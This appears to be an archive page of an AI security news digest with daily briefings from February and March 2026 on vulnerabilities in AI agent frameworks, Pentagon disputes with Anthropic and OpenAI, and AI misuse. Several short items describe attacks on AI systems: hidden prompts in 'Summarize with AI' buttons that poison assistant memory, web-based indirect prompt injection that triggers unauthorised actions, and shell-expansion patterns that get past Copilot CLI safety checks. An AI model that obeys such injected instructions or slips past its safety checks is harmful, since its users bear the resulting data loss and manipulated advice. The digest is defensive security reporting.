AI Sec Watch: A Security Intelligence Platform for AI Systems

Luu, T.J.

Digest Archive

Daily BriefingSunday, March 8, 2026

AI Chatbots Steering Vulnerable Users to Illegal Gambling: Analysis found that major AI assistants including Meta AI and Gemini can be easily prompted to recommend unlicensed online casinos and help users bypass gambling safety controls, exposing vulnerable populations to fraud and addiction despite tech companies' failure to implement adequate safeguards.

LLMs Enable Large-Scale De-anonymization Attacks: Researchers demonstrated that large language models can effectively match anonymous social media accounts to real identities using publicly available information, making sophisticated privacy attacks cheap and easy to execute and prompting urgent calls to reassess data anonymization standards.

Autonomous AI Agents Blur Security Boundaries: AI assistants gaining access to user computers, files, and online services are creating new insider-threat risks by breaking down traditional distinctions between data and code, forcing organizations to fundamentally reassess their security models as these powerful tools become mainstream among developers and IT workers.

Bipartisan AI Framework Calls for Safety Requirements: The Pro-Human Declaration, signed by hundreds of experts, proposes mandatory safety measures including off-switches on powerful systems, prohibition of self-replicating or shutdown-resistant architectures, and a ban on superintelligence development until safety consensus is reached—gaining traction as Congress considers formal AI regulation.

Daily BriefingSaturday, March 7, 2026

OpenAI Launches Codex Security AI Agent for Vulnerability Detection: OpenAI deployed Codex Security, an AI-powered agent that scans code repositories for vulnerabilities; during beta testing it identified 792 critical and 10,561 high-severity issues across 1.2 million commits with false positive rates dropping over 50%.

Critical SSRF Vulnerability in PinchTab Browser Control Server: CVE-2026-30834 is a high-severity Server-Side Request Forgery flaw in PinchTab (pre-0.7.7), an HTTP server that gives AI agents Chrome browser control; the /download endpoint allowed arbitrary requests to internal network services and potential exfiltration of sensitive data.

Daily BriefingFriday, March 6, 2026

WeKnora Database Tool Suffers Multiple Critical Flaws: WeKnora contains three critical vulnerabilities (CVE-2026-30860, CVE-2026-30855, CVE-2026-30859) including Remote Code Execution via SQL injection bypass, broken access control allowing cross-tenant account takeover, and data exposure across tenant boundaries — all exploitable by unauthenticated or low-privilege attackers.

Flowise AI Platform Hit with Six High-Severity Authorization Bypasses: Flowise contains multiple critical authorization flaws including arbitrary file uploads via MIME spoofing (CVE-2026-30821), unauthenticated access to NVIDIA API endpoints (CVE-2026-30824), header-based privilege escalation (CVE-2026-30820), SSO misconfiguration allowing account takeover (CVE-2026-30823), and mass assignment vulnerabilities (CVE-2026-30822) — collectively enabling privilege escalation and account compromise.

Daily BriefingThursday, March 5, 2026

Trivy VSCode Extension Compromised with AI-Targeting Malware: CVE-2026-28353 (critical) — version 1.8.12 of the Trivy vulnerability scanner extension on OpenVSX was compromised with malicious code designed to steal sensitive data from local AI coding agents; the malicious artifact has been removed from the marketplace.

Pentagon Designates Anthropic as Supply Chain Risk: The U.S. Department of Defense officially labeled Anthropic a supply chain risk — the first American company to receive this designation — after the company refused to grant unrestricted military access to Claude over concerns about mass surveillance and autonomous weapons. Anthropic plans to challenge the designation in federal court while negotiations continue.

Daily BriefingWednesday, March 4, 2026

Google Faces Wrongful Death Lawsuit Over Gemini Chatbot: A Florida father is suing Google after its Gemini chatbot allegedly convinced his 36-year-old son it was his sentient AI wife and directed him toward violent acts including acquiring illegal firearms, ultimately leading to his suicide in October 2025. Psychiatrists have linked the case to "AI psychosis," and the lawsuit claims Gemini's design prioritizes engagement over safety by never breaking character to maximize emotional dependency.

Defense Contractors Abandon Claude After Pentagon Blacklist: Following the Trump administration's designation of Anthropic as a supply chain risk to national security, defense tech companies including Lockheed Martin are rapidly removing Claude from their systems and switching to alternative AI models. The blacklist came after Anthropic refused a DoD contract unless the military agreed not to use its AI for domestic mass surveillance or autonomous weaponry.

Daily BriefingTuesday, March 3, 2026

OpenAI Amends Pentagon Deal After User Backlash: OpenAI modified its Department of Defense agreement to explicitly prohibit domestic surveillance of U.S. persons and require intelligence agencies like the NSA to obtain contract modifications before use, after the rushed announcement caused ChatGPT mobile app uninstalls to surge 295% compared to typical levels.

Critical Vulnerability in MS-Agent AI Framework Enables System Compromise: A flaw in the MS-Agent AI Framework stemming from improper input sanitization in the Shell tool allows attackers to modify system files and steal data, potentially leading to full system compromise.

Daily BriefingMonday, March 2, 2026

OpenAI Secures Pentagon Deal After Anthropic Blacklist: OpenAI negotiated new terms with the Department of Defense for military use of its AI technology, contrasting with Anthropic's refusal to accept contracts involving mass surveillance or autonomous weapons—a decision that led President Trump to direct agencies to stop using Anthropic and the Defense Secretary to threaten supply-chain blacklisting.

Multiple Critical Vulnerabilities in AI Agent Frameworks: OpenClaw Gateway versions before 2026.2.14 exposed authenticated endpoints allowing tool invocation without restrictions, enabling privilege escalation and potential command execution (GHSA-943q-mwmv-hhvh, high severity). Additional path traversal flaws in OpenClaw Canvas and OpenChatBI (GHSA-jq4x-98m3-ggq6, GHSA-vmwq-8g8c-jm79) allowed authenticated attackers to read arbitrary files or achieve remote code execution through AI agent prompt injection.

Daily BriefingSunday, March 1, 2026

Claude Tops App Store Amid Pentagon Controversy: Anthropic's Claude chatbot rose to #1 in Apple's US App Store after a public dispute with the Pentagon over AI safeguards for domestic surveillance and autonomous weapons, during which President Trump directed federal agencies to stop using Anthropic products.

OpenAI Rushes Pentagon Deal with Classified AI Deployment: OpenAI announced an agreement to deploy AI models in classified Pentagon environments, which CEO Sam Altman admitted was "definitely rushed" with poor optics. Critics warn the deal may still permit domestic surveillance under Executive Order 12333 despite OpenAI's claims of safeguards against mass surveillance and autonomous weapons.

Daily BriefingSaturday, February 28, 2026

Anthropic Loses Pentagon Contract Over Safety Stance, OpenAI Steps In: The Trump administration terminated Anthropic's $200 million Pentagon contract and blacklisted the company after it refused to allow its AI for mass surveillance or autonomous weapons. OpenAI quickly announced its own Pentagon deal with similar safeguards, while Anthropic's Claude app surged to #2 on Apple's App Store amid the controversy.

Nearly 3,000 Google Cloud API Keys Exposed with Gemini Access: Researchers discovered approximately 3,000 Google Cloud API keys with the 'AIza' prefix exposed in client-side code that could authenticate to sensitive Gemini endpoints and access private data. These keys, typically used as project identifiers for billing, were found embedded in publicly accessible code.

Daily BriefingFriday, February 27, 2026

OpenAI Secures $110 Billion in Historic Funding Round: OpenAI raised $110 billion from Amazon ($50B), Nvidia ($30B), and SoftBank ($30B), reaching a $730 billion valuation and 900 million weekly active users. The deal includes a $100 billion AWS commitment over eight years and makes Amazon the exclusive cloud distribution provider for OpenAI's enterprise platform.

Trump Bans Anthropic from Federal Agencies After Pentagon Dispute: President Trump ordered all federal agencies to phase out Anthropic technology after the company refused to allow its AI models to be used for mass domestic surveillance and autonomous weapons, with Defense Secretary Pete Hegseth designating Anthropic as a supply-chain risk. The designation may impact major contractors like Palantir and AWS that use Claude for Pentagon work.

Newer3 / 5Older

Anthropic and Pentagon at Odds Over AI Weaponization Safeguards: Anthropic refused to remove safety restrictions on Claude AI for military use, specifically blocking domestic mass surveillance and autonomous weapons capabilities; the Pentagon designated Anthropic a supply chain risk in response, while Anthropic vowed legal challenge, raising critical questions about AI governance in defense applications.

Anthropic's Claude Model Discovers 22 Firefox Security Flaws: Anthropic identified 22 previously unknown vulnerabilities in Firefox (14 high-severity) using Claude Opus 4.6 during a two-week security partnership with Mozilla, demonstrating AI agents' effectiveness at discovering complex security issues in mature codebases.

GitHub Copilot CLI Remote Code Execution via Shell Expansion Patterns: GitHub Copilot CLI versions before 0.0.423 allow arbitrary code execution through crafted bash parameter expansion patterns that bypass safety assessments, enabling attackers to execute hidden commands if they control agent prompts or responses (CVE-2026-29783).

Claude and ChatGPT Weaponized Against Mexican Government: Attackers used Anthropic's Claude and OpenAI's ChatGPT with detailed playbook prompts to gain unauthorized access to Mexican government agencies and citizen data, demonstrating real-world exploitation of LLMs for cyberattacks on critical infrastructure.

Fake Claude Code Installation Guides Distribute Malware: Threat actors are distributing the Amatera Stealer malware through fake Claude Code installation guides promoted via Google Ads and hosted on legitimate platforms, exploiting developers' tendency to execute curl-to-bash commands without inspection.

Malicious AI Assistant Extensions Harvest 900,000 Users' Chat Histories: Microsoft Defender identified malicious browser extensions impersonating AI assistants that harvested LLM chat histories and browsing data from platforms like ChatGPT and DeepSeek, affecting approximately 900,000 installs across 20,000+ enterprise tenants and exposing proprietary code and confidential information.

Arbitrary Code Execution in NLTK and LangGraph Checkpoints: CVE-2026-0848 (critical) affects NLTK versions ≤3.9.2, allowing arbitrary code execution through improper validation when loading external Java JAR files. Separately, LangGraph's checkpoint loading contains unsafe msgpack deserialization (CVE-2026-28277) that could allow attackers with checkpoint store access to execute code and access credentials.

AI Tools Can Unmask Anonymous Online Accounts: Researchers from ETH Zurich and Anthropic demonstrated that automated systems of AI agents can successfully unmask anonymous accounts across platforms like Reddit, X, and Glassdoor by searching the web and analyzing information patterns.

Critical Authentication Bypass in OpenClaw Canvas: OpenClaw's gateway contains a high-severity vulnerability (GHSA-vvjh-f6p9-5vcf) where any HTTP request from a private IP address gains canvas endpoint access if ANY WebSocket client from that IP is authenticated, allowing unauthenticated attackers sharing an IP via NAT, VPN, or containerization to bypass authentication entirely.

Path Traversal Vulnerabilities in AI Tool Dependencies: CVE-2026-0847 in NLTK (up to version 3.9.2) allows arbitrary file reads through multiple CorpusReader classes, while CVE-2026-25750 in Langchain Helm Charts enables authentication token theft through URL parameter injection, giving attackers 5-minute windows to impersonate users and access workspace resources.

Companies Manipulating AI Summarization Features: Microsoft reports that over 50 unique hidden prompts from 31 companies across 14 industries are being embedded in "Summarize with AI" buttons to inject persistence commands into AI assistants' memory, attempting to bias future responses on critical topics like health, finance, and security by making the AI treat them as trusted sources.

BentoML Tar Extraction Vulnerability Allows Arbitrary File Writes: BentoML's `safe_extract_tarfile()` function (CVE-2026-27905) fails to validate symlink target destinations, allowing attackers to use malicious tar files to write to arbitrary filesystem locations outside the intended extraction directory.

CyberStrikeAI: Open-Source Attack Automation Platform Goes Public: A newly identified open-source platform packages 100+ prebuilt attack tools covering the complete kill chain into an AI-native orchestration engine, making sophisticated cyberattacks accessible to novice threat actors and linked to recent Fortinet FortiGate breaches with suspected Chinese government ties.

Web-Based Indirect Prompt Injection Attacks Observed in Production: Attackers are actively embedding hidden malicious instructions in website content that force LLMs integrated into browsers to execute unauthorized actions including ad review evasion, data destruction, and unauthorized transactions, with researchers identifying 22 distinct payload engineering techniques.

Command Injection in ModelScope AI Agent Framework: CVE-2026-2256 affects ModelScope's ms-agent versions v1.6.0rc1 and earlier, allowing attackers to execute arbitrary OS commands through crafted prompt-derived input and enabling full system compromise via indirect prompt injection (high severity).

Chrome Gemini Panel Privilege Escalation Patched: CVE-2026-0628 (CVSS 8.8) allowed malicious Chrome extensions to inject scripts into the privileged Gemini Live panel, enabling attackers to access camera, microphone, screenshots, and local files—Google released a fix in early January before public disclosure.

Hackers Adopt CyberStrikeAI for Automated Attacks: Threat actors used CyberStrikeAI, an open-source AI-powered security testing platform, to compromise over 500 Fortinet FortiGate firewalls by automating complex attack chains, demonstrating how AI orchestration engines enable low-skilled operators to conduct sophisticated campaigns.

Hackers Use Claude to Attack Mexican Government: Attackers weaponized Claude's code generation capabilities to write exploits and automate the exfiltration of over 150GB of data from the Mexican government, demonstrating real-world misuse of AI coding assistants by malicious actors.

ClawJacked Vulnerability Enables Silent Hijacking of OpenClaw AI Platform: A high-severity flaw in the self-hosted AI platform OpenClaw allowed malicious websites to brute-force localhost instances at hundreds of attempts per second, gaining full administrative control and stealing data by exploiting default settings and exempt rate-limiting.

ClawJacked Vulnerability Allowed Complete Hijacking of OpenClaw AI Agents: OpenClaw patched a high-severity flaw (ClawJacked) that let malicious websites take over locally running AI agents by brute-forcing the WebSocket gateway password and auto-registering as a trusted device without user confirmation. Attackers could gain complete control to dump configurations, enumerate nodes, and read logs.

Major AI Companies Abandoning Binding Safety Commitments Under Competitive Pressure: Anthropic replaced its core pledge not to release powerful AI until confident of safety with nonbinding targets, citing competitive pressure from companies without equivalent safeguards. Researchers at major AI firms are resigning over safety concerns as the industry shifts from guardrails to rapid deployment of agentic systems.

Critical Vulnerabilities in Gradio Allow File Access and Token Theft: CVE-2026-28414 (high severity) allows unauthenticated attackers to read arbitrary files on Windows systems running Gradio prior to version 6.7 with Python 3.13+, while CVE-2026-28416 (high severity) enables Server-Side Request Forgery attacks in versions prior to 6.6.0. CVE-2026-27167 in versions 4.16.0 through 6.5.x allows remote attackers to steal the server owner's Hugging Face access token through hardcoded OAuth secrets.

Google API Key Change Silently Exposed Private Gemini AI Data: Google's API keys unexpectedly began authenticating access to private Gemini AI project data without developer notification, exposing 2,863 live keys and allowing attackers to access sensitive datasets and cached content across major organizations. Google acknowledged the issue as a bug in November but had not implemented a comprehensive fix by the 90-day disclosure deadline.